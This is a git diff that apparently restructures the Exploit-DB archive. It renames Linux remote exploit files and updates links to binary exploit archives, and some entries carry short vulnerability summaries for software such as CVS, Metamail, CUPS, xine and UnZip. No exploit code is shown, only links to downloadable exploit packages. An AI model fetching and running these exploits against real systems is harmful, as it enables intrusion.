exploits/linux/remote/22135.c diff --git a/platforms/linux/remote/22141.c b/exploits/linux/remote/22141.c similarity index 100% rename from platforms/linux/remote/22141.c rename to exploits/linux/remote/22141.c diff --git a/platforms/linux/remote/22143.txt b/exploits/linux/remote/22143.txt similarity index 100% rename from platforms/linux/remote/22143.txt rename to exploits/linux/remote/22143.txt diff --git a/platforms/linux/remote/22147.c b/exploits/linux/remote/22147.c similarity index 100% rename from platforms/linux/remote/22147.c rename to exploits/linux/remote/22147.c diff --git a/platforms/linux/remote/22187.txt b/exploits/linux/remote/22187.txt similarity index 89% rename from platforms/linux/remote/22187.txt rename to exploits/linux/remote/22187.txt index 781754c4b..16e3a8778 100644 --- a/platforms/linux/remote/22187.txt +++ b/exploits/linux/remote/22187.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/6650/info CVS is prone to a double free vulnerability in the Directory requests. An attacker may potentially take advantage of this issue to cause heap memory to be corrupted with attacker-supplied values, which may result in execution of arbitrary code. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22187.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22187.tar.gz \ No newline at end of file diff --git a/platforms/linux/remote/22205.txt b/exploits/linux/remote/22205.txt similarity index 100% rename from platforms/linux/remote/22205.txt rename to exploits/linux/remote/22205.txt diff --git a/platforms/linux/remote/22264.txt b/exploits/linux/remote/22264.txt similarity index 94% rename from platforms/linux/remote/22264.txt rename to exploits/linux/remote/22264.txt index 85508c86e..132b13372 100644 --- a/platforms/linux/remote/22264.txt +++ b/exploits/linux/remote/22264.txt @@ -6,4 +6,4 @@ The information loss was reduced in OpenSSL versions 0.9.6i and 0.9.7a. It is no *It should be noted that this attack is reportedly difficult to exploit and requires that the adversary be a man-in-the-middle. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22264.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22264.tar.gz \ No newline at end of file diff --git a/platforms/linux/remote/22274.c b/exploits/linux/remote/22274.c similarity index 100% rename from platforms/linux/remote/22274.c rename to exploits/linux/remote/22274.c diff --git a/platforms/linux/remote/22275.pl b/exploits/linux/remote/22275.pl similarity index 100% rename from platforms/linux/remote/22275.pl rename to exploits/linux/remote/22275.pl diff --git a/platforms/linux/remote/22278.pl b/exploits/linux/remote/22278.pl similarity index 100% rename from platforms/linux/remote/22278.pl rename to exploits/linux/remote/22278.pl diff --git a/platforms/linux/remote/22291.c b/exploits/linux/remote/22291.c similarity index 100% rename from platforms/linux/remote/22291.c rename to exploits/linux/remote/22291.c diff --git a/platforms/linux/remote/22342.c b/exploits/linux/remote/22342.c similarity index 100% rename from platforms/linux/remote/22342.c rename to exploits/linux/remote/22342.c diff --git a/platforms/linux/remote/22346.c b/exploits/linux/remote/22346.c similarity index 100% rename from platforms/linux/remote/22346.c rename to exploits/linux/remote/22346.c diff --git a/platforms/linux/remote/22353.c b/exploits/linux/remote/22353.c similarity index 100% rename from platforms/linux/remote/22353.c rename to exploits/linux/remote/22353.c diff --git a/platforms/linux/remote/22361.cpp b/exploits/linux/remote/22361.cpp similarity index 100% rename from platforms/linux/remote/22361.cpp rename to exploits/linux/remote/22361.cpp diff --git a/platforms/linux/remote/22369.txt b/exploits/linux/remote/22369.txt similarity index 100% rename from platforms/linux/remote/22369.txt rename to exploits/linux/remote/22369.txt diff --git a/platforms/linux/remote/22371.txt b/exploits/linux/remote/22371.txt similarity index 100% rename from platforms/linux/remote/22371.txt rename to exploits/linux/remote/22371.txt diff --git a/platforms/linux/remote/22379.c b/exploits/linux/remote/22379.c similarity index 100% rename from platforms/linux/remote/22379.c rename to exploits/linux/remote/22379.c diff --git a/platforms/linux/remote/22454.c b/exploits/linux/remote/22454.c similarity index 100% rename from platforms/linux/remote/22454.c rename to exploits/linux/remote/22454.c diff --git a/platforms/linux/remote/22479.c b/exploits/linux/remote/22479.c similarity index 100% rename from platforms/linux/remote/22479.c rename to exploits/linux/remote/22479.c diff --git a/platforms/linux/remote/22485.c b/exploits/linux/remote/22485.c similarity index 100% rename from platforms/linux/remote/22485.c rename to exploits/linux/remote/22485.c diff --git a/platforms/linux/remote/225.c b/exploits/linux/remote/225.c similarity index 100% rename from platforms/linux/remote/225.c rename to exploits/linux/remote/225.c diff --git a/platforms/linux/remote/22584.txt b/exploits/linux/remote/22584.txt similarity index 92% rename from platforms/linux/remote/22584.txt rename to exploits/linux/remote/22584.txt index 17b0a359e..39ed81956 100644 --- a/platforms/linux/remote/22584.txt +++ b/exploits/linux/remote/22584.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/7550/info Info-ZIP UnZip contains a vulnerability during the handling of pathnames for archived files. Specifically, when certain encoded characters are inserted into '../' directory traversal sequences, the creator of the archive can cause the file to be extracted to arbitrary locations on the filesystem - including paths containing system binaries and other sensitive or confidential information. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22584.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/22584.zip \ No newline at end of file diff --git a/platforms/linux/remote/226.c b/exploits/linux/remote/226.c similarity index 100% rename from platforms/linux/remote/226.c rename to exploits/linux/remote/226.c diff --git a/platforms/linux/remote/22601.txt b/exploits/linux/remote/22601.txt similarity index 100% rename from platforms/linux/remote/22601.txt rename to exploits/linux/remote/22601.txt diff --git a/platforms/linux/remote/22622.txt b/exploits/linux/remote/22622.txt similarity index 100% rename from platforms/linux/remote/22622.txt rename to exploits/linux/remote/22622.txt diff --git a/platforms/linux/remote/22623.txt b/exploits/linux/remote/22623.txt similarity index 100% rename from platforms/linux/remote/22623.txt rename to exploits/linux/remote/22623.txt diff --git a/platforms/linux/remote/22658.pl b/exploits/linux/remote/22658.pl similarity index 100% rename from platforms/linux/remote/22658.pl rename to exploits/linux/remote/22658.pl diff --git a/platforms/linux/remote/22659.c b/exploits/linux/remote/22659.c similarity index 100% rename from platforms/linux/remote/22659.c rename to exploits/linux/remote/22659.c diff --git a/platforms/linux/remote/227.c b/exploits/linux/remote/227.c similarity index 100% rename from platforms/linux/remote/227.c rename to exploits/linux/remote/227.c diff --git a/platforms/linux/remote/2274.c b/exploits/linux/remote/2274.c similarity index 100% rename from platforms/linux/remote/2274.c rename to exploits/linux/remote/2274.c diff --git a/platforms/linux/remote/22771.txt b/exploits/linux/remote/22771.txt similarity index 100% rename from platforms/linux/remote/22771.txt rename to exploits/linux/remote/22771.txt diff --git a/platforms/linux/remote/22786.c b/exploits/linux/remote/22786.c similarity index 100% rename from platforms/linux/remote/22786.c rename to exploits/linux/remote/22786.c diff --git a/platforms/linux/remote/22830.c b/exploits/linux/remote/22830.c similarity index 100% rename from platforms/linux/remote/22830.c rename to exploits/linux/remote/22830.c diff --git a/platforms/linux/remote/22848.c b/exploits/linux/remote/22848.c similarity index 100% rename from platforms/linux/remote/22848.c rename to exploits/linux/remote/22848.c diff --git a/platforms/linux/remote/22856.rb b/exploits/linux/remote/22856.rb similarity index 100% rename from platforms/linux/remote/22856.rb rename to exploits/linux/remote/22856.rb diff --git a/platforms/linux/remote/22873.c b/exploits/linux/remote/22873.c similarity index 100% rename from platforms/linux/remote/22873.c rename to exploits/linux/remote/22873.c diff --git a/platforms/linux/remote/22893.c b/exploits/linux/remote/22893.c similarity index 100% rename from platforms/linux/remote/22893.c rename to exploits/linux/remote/22893.c diff --git a/platforms/linux/remote/22894.c b/exploits/linux/remote/22894.c similarity index 100% rename from platforms/linux/remote/22894.c rename to exploits/linux/remote/22894.c diff --git a/platforms/linux/remote/22908.c b/exploits/linux/remote/22908.c similarity index 100% rename from platforms/linux/remote/22908.c rename to exploits/linux/remote/22908.c diff --git a/platforms/linux/remote/22968.c b/exploits/linux/remote/22968.c similarity index 100% rename from platforms/linux/remote/22968.c rename to exploits/linux/remote/22968.c diff --git a/platforms/linux/remote/22969.c b/exploits/linux/remote/22969.c similarity index 100% rename from platforms/linux/remote/22969.c rename to exploits/linux/remote/22969.c diff --git a/platforms/linux/remote/230.c b/exploits/linux/remote/230.c similarity index 100% rename from platforms/linux/remote/230.c rename to exploits/linux/remote/230.c diff --git a/platforms/linux/remote/23049.c b/exploits/linux/remote/23049.c similarity index 100% rename from platforms/linux/remote/23049.c rename to exploits/linux/remote/23049.c diff --git a/platforms/linux/remote/23054.txt b/exploits/linux/remote/23054.txt similarity index 100% rename from platforms/linux/remote/23054.txt rename to exploits/linux/remote/23054.txt diff --git a/platforms/linux/remote/23082.txt b/exploits/linux/remote/23082.txt similarity index 94% rename from platforms/linux/remote/23082.txt rename to exploits/linux/remote/23082.txt index 7e92a109f..fdf731474 100644 --- a/platforms/linux/remote/23082.txt +++ b/exploits/linux/remote/23082.txt @@ -1,4 +1,4 @@ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23082.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23082.zip SSH Tectia Remote Authentication Bypass Tectia is the commercial OpenSSH solution. The product can be found at: diff --git a/platforms/linux/remote/23115.c b/exploits/linux/remote/23115.c similarity index 100% rename from platforms/linux/remote/23115.c rename to exploits/linux/remote/23115.c diff --git a/platforms/linux/remote/23151.c b/exploits/linux/remote/23151.c similarity index 100% rename from platforms/linux/remote/23151.c rename to exploits/linux/remote/23151.c diff --git a/platforms/linux/remote/23161.c b/exploits/linux/remote/23161.c similarity index 100% rename from platforms/linux/remote/23161.c rename to exploits/linux/remote/23161.c diff --git a/platforms/linux/remote/23162.c b/exploits/linux/remote/23162.c similarity index 100% rename from platforms/linux/remote/23162.c rename to exploits/linux/remote/23162.c diff --git a/platforms/linux/remote/23171.c b/exploits/linux/remote/23171.c similarity index 100% rename from platforms/linux/remote/23171.c rename to exploits/linux/remote/23171.c diff --git a/platforms/linux/remote/23182.c b/exploits/linux/remote/23182.c similarity index 100% rename from platforms/linux/remote/23182.c rename to exploits/linux/remote/23182.c diff --git a/platforms/linux/remote/23183.c b/exploits/linux/remote/23183.c similarity index 100% rename from platforms/linux/remote/23183.c rename to exploits/linux/remote/23183.c diff --git a/platforms/linux/remote/23186.txt b/exploits/linux/remote/23186.txt similarity index 100% rename from platforms/linux/remote/23186.txt rename to exploits/linux/remote/23186.txt diff --git a/platforms/linux/remote/23188.c b/exploits/linux/remote/23188.c similarity index 100% rename from platforms/linux/remote/23188.c rename to exploits/linux/remote/23188.c diff --git a/platforms/linux/remote/23196.c b/exploits/linux/remote/23196.c similarity index 100% rename from platforms/linux/remote/23196.c rename to exploits/linux/remote/23196.c diff --git a/platforms/linux/remote/23295.txt b/exploits/linux/remote/23295.txt similarity index 100% rename from platforms/linux/remote/23295.txt rename to exploits/linux/remote/23295.txt diff --git a/platforms/linux/remote/23296.txt b/exploits/linux/remote/23296.txt similarity index 100% rename from platforms/linux/remote/23296.txt rename to exploits/linux/remote/23296.txt diff --git a/platforms/linux/remote/23306.c b/exploits/linux/remote/23306.c similarity index 100% rename from platforms/linux/remote/23306.c rename to exploits/linux/remote/23306.c diff --git a/platforms/linux/remote/23366.c b/exploits/linux/remote/23366.c similarity index 100% rename from platforms/linux/remote/23366.c rename to exploits/linux/remote/23366.c diff --git a/platforms/linux/remote/23368.c b/exploits/linux/remote/23368.c similarity index 100% rename from platforms/linux/remote/23368.c rename to exploits/linux/remote/23368.c diff --git a/platforms/linux/remote/23369.c b/exploits/linux/remote/23369.c similarity index 100% rename from platforms/linux/remote/23369.c rename to exploits/linux/remote/23369.c diff --git a/platforms/linux/remote/23371.c b/exploits/linux/remote/23371.c similarity index 100% rename from platforms/linux/remote/23371.c rename to exploits/linux/remote/23371.c diff --git a/platforms/linux/remote/23397.pl b/exploits/linux/remote/23397.pl similarity index 100% rename from platforms/linux/remote/23397.pl rename to exploits/linux/remote/23397.pl diff --git a/platforms/linux/remote/23413.c b/exploits/linux/remote/23413.c similarity index 100% rename from platforms/linux/remote/23413.c rename to exploits/linux/remote/23413.c diff --git a/platforms/linux/remote/23441.c b/exploits/linux/remote/23441.c similarity index 100% rename from platforms/linux/remote/23441.c rename to exploits/linux/remote/23441.c diff --git a/platforms/linux/remote/23585.txt b/exploits/linux/remote/23585.txt similarity index 100% rename from platforms/linux/remote/23585.txt rename to exploits/linux/remote/23585.txt diff --git a/platforms/linux/remote/23604.txt b/exploits/linux/remote/23604.txt similarity index 100% rename from platforms/linux/remote/23604.txt rename to exploits/linux/remote/23604.txt diff --git a/platforms/linux/remote/23671.txt b/exploits/linux/remote/23671.txt similarity index 100% rename from platforms/linux/remote/23671.txt rename to exploits/linux/remote/23671.txt diff --git a/platforms/linux/remote/237.c b/exploits/linux/remote/237.c similarity index 100% rename from platforms/linux/remote/237.c rename to exploits/linux/remote/237.c diff --git a/platforms/linux/remote/23728.txt b/exploits/linux/remote/23728.txt similarity index 78% rename from platforms/linux/remote/23728.txt rename to exploits/linux/remote/23728.txt index 595613e29..66540b482 100644 --- a/platforms/linux/remote/23728.txt +++ b/exploits/linux/remote/23728.txt @@ -2,12 +2,12 @@ source: http://www.securityfocus.com/bid/9692/info Metamail has been reported prone to multiple vulnerabilities that may provide for arbitrary code execution. Two buffer overflow vulnerabilities have been reported to affect Metamail. Additionally, two format string-handling vulnerabilities have been reported. These issues may also be exploited by a remote attacker to execute arbitrary code. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23728-1.splitmail +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23728-1.splitmail -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23728-2.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23728-2.tgz -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23728-3 +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23728-3 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23728-4 +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23728-4 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23728-5 \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23728-5 \ No newline at end of file diff --git a/platforms/linux/remote/23740.c b/exploits/linux/remote/23740.c similarity index 100% rename from platforms/linux/remote/23740.c rename to exploits/linux/remote/23740.c diff --git a/platforms/linux/remote/23771.pl b/exploits/linux/remote/23771.pl similarity index 100% rename from platforms/linux/remote/23771.pl rename to exploits/linux/remote/23771.pl diff --git a/platforms/linux/remote/23772.c b/exploits/linux/remote/23772.c similarity index 100% rename from platforms/linux/remote/23772.c rename to exploits/linux/remote/23772.c diff --git a/platforms/linux/remote/23777.txt b/exploits/linux/remote/23777.txt similarity index 100% rename from platforms/linux/remote/23777.txt rename to exploits/linux/remote/23777.txt diff --git a/platforms/linux/remote/23794.txt b/exploits/linux/remote/23794.txt similarity index 100% rename from platforms/linux/remote/23794.txt rename to exploits/linux/remote/23794.txt diff --git a/platforms/linux/remote/23801.txt b/exploits/linux/remote/23801.txt similarity index 100% rename from platforms/linux/remote/23801.txt rename to exploits/linux/remote/23801.txt diff --git a/platforms/linux/remote/23802.txt b/exploits/linux/remote/23802.txt similarity index 100% rename from platforms/linux/remote/23802.txt rename to exploits/linux/remote/23802.txt diff --git a/platforms/linux/remote/23803.txt b/exploits/linux/remote/23803.txt similarity index 100% rename from platforms/linux/remote/23803.txt rename to exploits/linux/remote/23803.txt diff --git a/platforms/linux/remote/23811.c b/exploits/linux/remote/23811.c similarity index 100% rename from platforms/linux/remote/23811.c rename to exploits/linux/remote/23811.c diff --git a/platforms/linux/remote/23848.txt b/exploits/linux/remote/23848.txt similarity index 100% rename from platforms/linux/remote/23848.txt rename to exploits/linux/remote/23848.txt diff --git a/platforms/linux/remote/23864.txt b/exploits/linux/remote/23864.txt similarity index 100% rename from platforms/linux/remote/23864.txt rename to exploits/linux/remote/23864.txt diff --git a/platforms/linux/remote/23881.txt b/exploits/linux/remote/23881.txt similarity index 87% rename from platforms/linux/remote/23881.txt rename to exploits/linux/remote/23881.txt index cc9cbf1b4..e76cd94cc 100644 --- a/platforms/linux/remote/23881.txt +++ b/exploits/linux/remote/23881.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/9974/info Multiple locally and remotely exploitable buffer overrun and format strings were reported in emil. This could permit execution of arbitrary code in the context of the software. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23881.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/23881.tar.gz \ No newline at end of file diff --git a/platforms/linux/remote/23936.pl b/exploits/linux/remote/23936.pl similarity index 100% rename from platforms/linux/remote/23936.pl rename to exploits/linux/remote/23936.pl diff --git a/platforms/linux/remote/24.c b/exploits/linux/remote/24.c similarity index 100% rename from platforms/linux/remote/24.c rename to exploits/linux/remote/24.c diff --git a/platforms/linux/remote/24038.txt b/exploits/linux/remote/24038.txt similarity index 100% rename from platforms/linux/remote/24038.txt rename to exploits/linux/remote/24038.txt diff --git a/platforms/linux/remote/24079.c b/exploits/linux/remote/24079.c similarity index 100% rename from platforms/linux/remote/24079.c rename to exploits/linux/remote/24079.c diff --git a/platforms/linux/remote/24093.c b/exploits/linux/remote/24093.c similarity index 100% rename from platforms/linux/remote/24093.c rename to exploits/linux/remote/24093.c diff --git a/platforms/linux/remote/24105.txt b/exploits/linux/remote/24105.txt similarity index 100% rename from platforms/linux/remote/24105.txt rename to exploits/linux/remote/24105.txt diff --git a/platforms/linux/remote/24106.txt b/exploits/linux/remote/24106.txt similarity index 100% rename from platforms/linux/remote/24106.txt rename to exploits/linux/remote/24106.txt diff --git a/platforms/linux/remote/24120.pl b/exploits/linux/remote/24120.pl similarity index 100% rename from platforms/linux/remote/24120.pl rename to exploits/linux/remote/24120.pl diff --git a/platforms/linux/remote/24136.txt b/exploits/linux/remote/24136.txt similarity index 100% rename from platforms/linux/remote/24136.txt rename to exploits/linux/remote/24136.txt diff --git a/platforms/linux/remote/24159.rb b/exploits/linux/remote/24159.rb similarity index 100% rename from platforms/linux/remote/24159.rb rename to exploits/linux/remote/24159.rb diff --git a/platforms/linux/remote/24160.txt b/exploits/linux/remote/24160.txt similarity index 100% rename from platforms/linux/remote/24160.txt rename to exploits/linux/remote/24160.txt diff --git a/platforms/linux/remote/24165.pl b/exploits/linux/remote/24165.pl similarity index 100% rename from platforms/linux/remote/24165.pl rename to exploits/linux/remote/24165.pl diff --git a/platforms/linux/remote/24179.txt b/exploits/linux/remote/24179.txt similarity index 100% rename from platforms/linux/remote/24179.txt rename to exploits/linux/remote/24179.txt diff --git a/platforms/linux/remote/24205.txt b/exploits/linux/remote/24205.txt similarity index 100% rename from platforms/linux/remote/24205.txt rename to exploits/linux/remote/24205.txt diff --git a/platforms/linux/remote/24221.pl b/exploits/linux/remote/24221.pl similarity index 100% rename from platforms/linux/remote/24221.pl rename to exploits/linux/remote/24221.pl diff --git a/platforms/linux/remote/24223.py b/exploits/linux/remote/24223.py similarity index 100% rename from platforms/linux/remote/24223.py rename to exploits/linux/remote/24223.py diff --git a/platforms/linux/remote/24259.c b/exploits/linux/remote/24259.c similarity index 100% rename from platforms/linux/remote/24259.c rename to exploits/linux/remote/24259.c diff --git a/platforms/linux/remote/24312.html b/exploits/linux/remote/24312.html similarity index 100% rename from platforms/linux/remote/24312.html rename to exploits/linux/remote/24312.html diff --git a/platforms/linux/remote/24338.c b/exploits/linux/remote/24338.c similarity index 100% rename from platforms/linux/remote/24338.c rename to exploits/linux/remote/24338.c diff --git a/platforms/linux/remote/24339.c b/exploits/linux/remote/24339.c similarity index 100% rename from platforms/linux/remote/24339.c rename to exploits/linux/remote/24339.c diff --git a/platforms/linux/remote/24361.c b/exploits/linux/remote/24361.c similarity index 100% rename from platforms/linux/remote/24361.c rename to exploits/linux/remote/24361.c diff --git a/platforms/linux/remote/24622.c b/exploits/linux/remote/24622.c similarity index 100% rename from platforms/linux/remote/24622.c rename to exploits/linux/remote/24622.c diff --git a/platforms/linux/remote/24669.txt b/exploits/linux/remote/24669.txt similarity index 100% rename from platforms/linux/remote/24669.txt rename to exploits/linux/remote/24669.txt diff --git a/platforms/linux/remote/24704.c b/exploits/linux/remote/24704.c similarity index 100% rename from platforms/linux/remote/24704.c rename to exploits/linux/remote/24704.c diff --git a/platforms/linux/remote/24784.txt b/exploits/linux/remote/24784.txt similarity index 93% rename from platforms/linux/remote/24784.txt rename to exploits/linux/remote/24784.txt index 9c9e96cd3..92f348a99 100644 --- a/platforms/linux/remote/24784.txt +++ b/exploits/linux/remote/24784.txt @@ -4,4 +4,4 @@ The file command is affected by a buffer overflow vulnerability. This issue is d An attacker may leverage this issue to execute arbitrary code with the privileges of a user that processes the malicious file with the affected utility. This may be leveraged to escalate privileges or to gain unauthorized access. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24784.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24784.zip \ No newline at end of file diff --git a/platforms/linux/remote/24794.sh b/exploits/linux/remote/24794.sh similarity index 100% rename from platforms/linux/remote/24794.sh rename to exploits/linux/remote/24794.sh diff --git a/platforms/linux/remote/24795.txt b/exploits/linux/remote/24795.txt similarity index 100% rename from platforms/linux/remote/24795.txt rename to exploits/linux/remote/24795.txt diff --git a/platforms/linux/remote/24801.txt b/exploits/linux/remote/24801.txt similarity index 100% rename from platforms/linux/remote/24801.txt rename to exploits/linux/remote/24801.txt diff --git a/platforms/linux/remote/24813.pl b/exploits/linux/remote/24813.pl similarity index 100% rename from platforms/linux/remote/24813.pl rename to exploits/linux/remote/24813.pl diff --git a/platforms/linux/remote/24848.txt b/exploits/linux/remote/24848.txt similarity index 94% rename from platforms/linux/remote/24848.txt rename to exploits/linux/remote/24848.txt index a01f6c808..a3886df25 100644 --- a/platforms/linux/remote/24848.txt +++ b/exploits/linux/remote/24848.txt @@ -8,4 +8,4 @@ If a user obtains this file and processes it through ChBg, the attacker-supplied ChBg 1.5 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24848.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24848.zip \ No newline at end of file diff --git a/platforms/linux/remote/24852.txt b/exploits/linux/remote/24852.txt similarity index 92% rename from platforms/linux/remote/24852.txt rename to exploits/linux/remote/24852.txt index f2ce7a250..11624b050 100644 --- a/platforms/linux/remote/24852.txt +++ b/exploits/linux/remote/24852.txt @@ -4,4 +4,4 @@ A remote client-side buffer overflow vulnerability affects mpg123. This issue is An attacker may exploit this issue to execute arbitrary code with the privileges of the user that activated the vulnerable application. This may facilitate unauthorized access or privilege escalation. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24852.list \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24852.list \ No newline at end of file diff --git a/platforms/linux/remote/24853.c b/exploits/linux/remote/24853.c similarity index 100% rename from platforms/linux/remote/24853.c rename to exploits/linux/remote/24853.c diff --git a/platforms/linux/remote/24856.c b/exploits/linux/remote/24856.c similarity index 100% rename from platforms/linux/remote/24856.c rename to exploits/linux/remote/24856.c diff --git a/platforms/linux/remote/24857.c b/exploits/linux/remote/24857.c similarity index 100% rename from platforms/linux/remote/24857.c rename to exploits/linux/remote/24857.c diff --git a/platforms/linux/remote/24888.rb b/exploits/linux/remote/24888.rb similarity index 100% rename from platforms/linux/remote/24888.rb rename to exploits/linux/remote/24888.rb diff --git a/platforms/linux/remote/24935.rb b/exploits/linux/remote/24935.rb similarity index 100% rename from platforms/linux/remote/24935.rb rename to exploits/linux/remote/24935.rb diff --git a/platforms/linux/remote/24937.rb b/exploits/linux/remote/24937.rb similarity index 100% rename from platforms/linux/remote/24937.rb rename to exploits/linux/remote/24937.rb diff --git a/platforms/linux/remote/24947.txt b/exploits/linux/remote/24947.txt similarity index 100% rename from platforms/linux/remote/24947.txt rename to exploits/linux/remote/24947.txt diff --git a/platforms/linux/remote/24955.rb b/exploits/linux/remote/24955.rb similarity index 100% rename from platforms/linux/remote/24955.rb rename to exploits/linux/remote/24955.rb diff --git a/platforms/linux/remote/24977.txt b/exploits/linux/remote/24977.txt similarity index 95% rename from platforms/linux/remote/24977.txt rename to exploits/linux/remote/24977.txt index d921516e0..56223eecf 100644 --- a/platforms/linux/remote/24977.txt +++ b/exploits/linux/remote/24977.txt @@ -4,7 +4,7 @@ CUPS is reported prone to a remote buffer overflow vulnerability. The issue is r A remote attacker may exploit this condition to execute arbitrary code in the context of the vulnerable CUPS daemon. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24977.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24977.gz diff --git a/platforms/linux/remote/24978.txt b/exploits/linux/remote/24978.txt similarity index 90% rename from platforms/linux/remote/24978.txt rename to exploits/linux/remote/24978.txt index f99b8d4e5..efd56e219 100644 --- a/platforms/linux/remote/24978.txt +++ b/exploits/linux/remote/24978.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/11969/info It is reported that the xine media library is affected by a remote buffer overflow vulnerability. This issue can allow a remote attacker to gain unauthorized access to a vulnerable computer. The overflow condition presents itself in the 'demux_aiff.c' file. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24978.avi \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/24978.avi \ No newline at end of file diff --git a/platforms/linux/remote/25.c b/exploits/linux/remote/25.c similarity index 100% rename from platforms/linux/remote/25.c rename to exploits/linux/remote/25.c diff --git a/platforms/linux/remote/25001.rb b/exploits/linux/remote/25001.rb similarity index 100% rename from platforms/linux/remote/25001.rb rename to exploits/linux/remote/25001.rb diff --git a/platforms/linux/remote/25005.txt b/exploits/linux/remote/25005.txt similarity index 93% rename from platforms/linux/remote/25005.txt rename to exploits/linux/remote/25005.txt index 4e7ab156d..607206bbb 100644 --- a/platforms/linux/remote/25005.txt +++ b/exploits/linux/remote/25005.txt @@ -4,4 +4,4 @@ NASM is prone to a buffer overflow. This condition is exposed when the applicati Successful exploitation will permit arbitrary code execution with the privileges of the user running the application. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25005.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25005.zip \ No newline at end of file diff --git a/platforms/linux/remote/25006.txt b/exploits/linux/remote/25006.txt similarity index 93% rename from platforms/linux/remote/25006.txt rename to exploits/linux/remote/25006.txt index e59f6cd64..a384db311 100644 --- a/platforms/linux/remote/25006.txt +++ b/exploits/linux/remote/25006.txt @@ -4,4 +4,4 @@ It is reported that rtf2latex2e is susceptible to a stack buffer overflow vulner This vulnerability allows remote attackers to alter the proper flow of execution of the application, potentially resulting in the execution of attacker-supplied machine code in the context of the application attempting to read the malicious RTF file. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25006.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25006.zip \ No newline at end of file diff --git a/platforms/linux/remote/25008.txt b/exploits/linux/remote/25008.txt similarity index 94% rename from platforms/linux/remote/25008.txt rename to exploits/linux/remote/25008.txt index 9a4cb5dc0..7bc9f842c 100644 --- a/platforms/linux/remote/25008.txt +++ b/exploits/linux/remote/25008.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue by crafting a malicious message that contains LinPopUp version 1.2.0 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25008.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25008.zip \ No newline at end of file diff --git a/platforms/linux/remote/25010.txt b/exploits/linux/remote/25010.txt similarity index 92% rename from platforms/linux/remote/25010.txt rename to exploits/linux/remote/25010.txt index c55648dca..558af59b8 100644 --- a/platforms/linux/remote/25010.txt +++ b/exploits/linux/remote/25010.txt @@ -4,4 +4,4 @@ o3read is prone to a buffer overflow vulnerability. This issue is exposed when t Successful exploitation will result in code execution with the privileges of the user running the application. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25010.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25010.zip \ No newline at end of file diff --git a/platforms/linux/remote/25015.txt b/exploits/linux/remote/25015.txt similarity index 95% rename from platforms/linux/remote/25015.txt rename to exploits/linux/remote/25015.txt index e02976b64..fa5765b70 100644 --- a/platforms/linux/remote/25015.txt +++ b/exploits/linux/remote/25015.txt @@ -8,4 +8,4 @@ If a user obtains this file and processes it through the application, the attack Ringtone Tools version 2.22 is reported prone to this vulnerability. It is likely that other versions are affected as well. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25015.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25015.zip \ No newline at end of file diff --git a/platforms/linux/remote/25030.txt b/exploits/linux/remote/25030.txt similarity index 91% rename from platforms/linux/remote/25030.txt rename to exploits/linux/remote/25030.txt index 49562dc77..d8ec5b0de 100644 --- a/platforms/linux/remote/25030.txt +++ b/exploits/linux/remote/25030.txt @@ -4,4 +4,4 @@ GNU UnRTF is prone to a buffer overflow vulnerability. This issue is exposed whe Successful exploitation will result in execution of arbitrary code. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/25030.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/25030.zip \ No 